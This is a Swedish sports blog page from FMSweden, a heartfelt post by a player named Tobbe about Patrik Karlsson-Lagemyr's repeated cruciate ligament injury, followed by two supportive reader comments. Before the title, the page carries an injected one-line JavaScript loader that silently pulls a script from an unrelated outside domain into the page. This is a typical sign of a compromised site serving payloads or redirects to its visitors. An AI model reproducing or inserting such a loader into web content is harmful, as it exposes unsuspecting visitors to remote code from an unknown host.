;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); TÅRAR – FMSweden
Meny Stäng

TÅRAR

Vad säger man till nån, som inte finns något att säga till?

Vad kan man göra för någon som står i de djupaste av avgrunder ytterligare en gång?

Vad finns det för rättvisa att hänvisa till, när livet slås i spillror ännu en gång?

Man skulle kunna tro att jag pratar om livet, att det är skört och att man inte förstår vad man har förrän det är för sent. Det finns under dessa tider som vi lever i givetvis perspektiv på saker och att en skada kanske inte är allt i livet.

Jag har aldrig varit allvarligt skadad. Jag har suttit på rehabcykeln under perioder och svurit över att det är så satans tråkigt, kollat ett steg längre in i gymmet och hittat Robin Söder, eller Sebastian Eriksson. Båda med knäproblem som jag inte önskar min värsta fiende. Det har alltid funnits nån där i gymmet, som haft det mycket värre än vad jag har det.

Man ser inte riktigt det när man är i skadebubblan, men om man tillåter sig krypa ur den en liten stund, så ser man världen på ett annat sätt.

Min “värsta” skada var en benhinneinflammation som tog 3 månader att läka. Jag var 18 år och höll på att missa Gothia Cup. Det var sååå orättvist. Hade jag vetat det jag vet nu, hade jag sagt till mig själv:

HÅLL DIN KÄFT (det var så danskarna alltid sa)

 

All denna texten grundar sig i Patrik Karlsson-Lagemyrs fruktansvärda öde, med en ny korsbandsskada. Min rumskamrat i Leksand i Moskogen.

Min f.d lagkamrats lillebror (delade rum med Fredrik Lagemyr under vår tid i BK Häcken)

Det har varit väldigt många korsbandsskador i Allsvenskan även för damerna i år och tro inte att jag glömmer eller för den delen inte vet det.

Till alla er, till den som fått sin första, till den som fått sin andra, till den som fått sin sista och kanske måste ta det smärtsamma beslutet att sluta med det vi alla älskar:

 

Ni är inte ensamma, när det känns som mörkast så finns vi alla där. Ett samtal eller ett SMS bort. På Twitter, Facebook och Instagram finns alltid en hjälpande hand eller röst.

JAG HAR INTE VARIT ALLVARLIGT SKADAD, MEN JAG ÄR MÄNNISKA OCH JAG BRYR MIG. 

Ta hand om er, känn kärleken och kämpa på!!

Tobbe

Please wait...

Liknande Inlägg

3 kommentarer

  1. Ruuutan

    Det är så otroligt sorgligt att han åker på detta igen. Jag vill inte ens yttra mig om Pakas fotbolls öde efter denna återkommande skada. Jag Jag hoppade på mirakel efter andra gången, men nu känns det oerhört tungt. Kämpa <3

  2. Micke

    Håller med, väldigt ledsamt med så pass många allvarliga skador. FFF har haft ovanligt många korsbandsskador de senaste åren och det är lika tråkigt varje gång när en spelare drabbas. Hoppas Paka får en lyckad rehab nu.

Lämna ett svar